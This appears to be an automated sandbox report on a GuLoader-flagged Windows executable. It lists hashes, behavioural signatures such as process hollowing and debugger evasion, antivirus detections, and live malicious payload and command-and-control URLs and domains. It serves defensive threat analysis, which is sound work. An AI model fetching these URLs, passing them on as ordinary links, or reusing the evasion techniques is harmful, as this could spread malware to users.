2020-06-05 14:13:37,515 [root] INFO: Uploading files at path "C:\AZpGbR\debugger" 
2020-06-05 14:13:37,562 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7x64_2 win7x64_6 KVM 2020-06-05 14:10:07 2020-06-05 14:16:26

File Details

File Name k9.exe
File Size 110592 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2015-12-29 22:49:03
MD5 e90f65f7349ec9abc20d69db96c6e241
SHA1 23f23cc9d0c74c15c8cb49ab5bb9b7fc5522c9cc
SHA256 2a093b2213d7d589020d69e76fdfd33b441ed125664cb3247d25e9103744011c
SHA512 6b0d903d2d8c46ffb618fb870f49090e6c2d2472ebdc8483c31207bda61d224eb658c3299a9ea7f8f80534e0471e623c270caac68a9fcfd5ec933b88c228d144
CRC32 D8FC3B2A
Ssdeep 3072:4rdhcMmoFKEeSDpZjl57ivuPwfSVgPut2keB7JsdoYwKf0Nx:4IXoAT0iv0eB7JsnwKf0j
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2940 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 2940 trigged the Yara rule 'shellcode_patterns'
Hit: PID 2940 trigged the Yara rule 'HeavensGate'
Hit: PID 2940 trigged the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: k9.exe, PID 2940
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
HTTPS urls from behavior.
URL: http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
CAPE extracted potentially suspicious content
k9.exe: Injected PE Image: 32-bit DLL
k9.exe: Unpacked Shellcode
k9.exe: GuLoader
k9.exe: Injected PE Image: 32-bit executable
k9.exe: Unpacked Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.vinoblay.com/mts/
suspicious_request: http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
suspicious_request: http://www.esprit-de-connaisseur.com/mts/
Performs some HTTP requests
url: http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
url: http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
url: http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
url: http://www.vinoblay.com/mts/
url: http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
url: http://www.esprit-de-connaisseur.com/mts/
Unconventionial language used in binary resources: Catalan
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Louise\AppData\Local\Temp\k9.exe
Behavioural detection: Injection (Process Hollowing)
Injection: k9.exe(2940) -> k9.exe(2476)
Executed a process and injected code into it, probably while unpacking
Injection: k9.exe(2940) -> k9.exe(2476)
Behavioural detection: Injection (inter-process)
File has been identified by 15 Antiviruses on VirusTotal as malicious
Qihoo-360: HEUR/QVM03.0.B441.Malware.Gen
Cylance: Unsafe
Sangfor: Malware
APEX: Malicious
Kaspersky: UDS:DangerousObject.Multi.Generic
Paloalto: generic.ml
Trapmine: malicious.high.ml.score
SentinelOne: DFI - Suspicious PE
Endgame: malicious (high confidence)
ZoneAlarm: UDS:DangerousObject.Multi.Generic
McAfee: Fareit-FST!E90F65F7349E
ESET-NOD32: a variant of Win32/GenKryptik.ELXE
Rising: Downloader.Guloader!1.C738 (CLASSIC)
eGambit: Unsafe.AI_Score_80%
BitDefenderTheta: Gen:[email protected]
Attempts to modify proxy settings
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Eitest

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 67.217.34.88 [VT] United States
N 63.250.37.110 [VT] United States
Y 51.105.208.173 [VT] United Kingdom
N 23.20.239.12 [VT] United States
N 188.165.53.185 [VT] France

DNS

Name Response Post-Analysis Lookup
amuhapps.com [VT] A 67.217.34.88 [VT] 67.217.34.88 [VT]
www.parkwayautogroup.com [VT] A 23.20.239.12 [VT] 23.20.239.12 [VT]
www.aroundthehearth.net [VT] NXDOMAIN
www.vinoblay.com [VT] A 63.250.37.110 [VT] 63.250.37.110 [VT]
www.esprit-de-connaisseur.com [VT] A 188.165.53.185 [VT] 188.165.53.185 [VT]
www.cp75788.com [VT]
www.eskenaskhareji.com [VT]
www.hissexualhealth.com [VT]
www.electriciandearbornmi.com [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\k9.exe.cfg
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\SysWOW64\msvbvm60.dll
C:\Windows\SysWOW64\ntdll.dll
C:\Users\Louise\AppData\Local\Temp\~DFE3607EB907E82968.TMP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\antistrike\VIKTUALIEFORRETNINGS
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
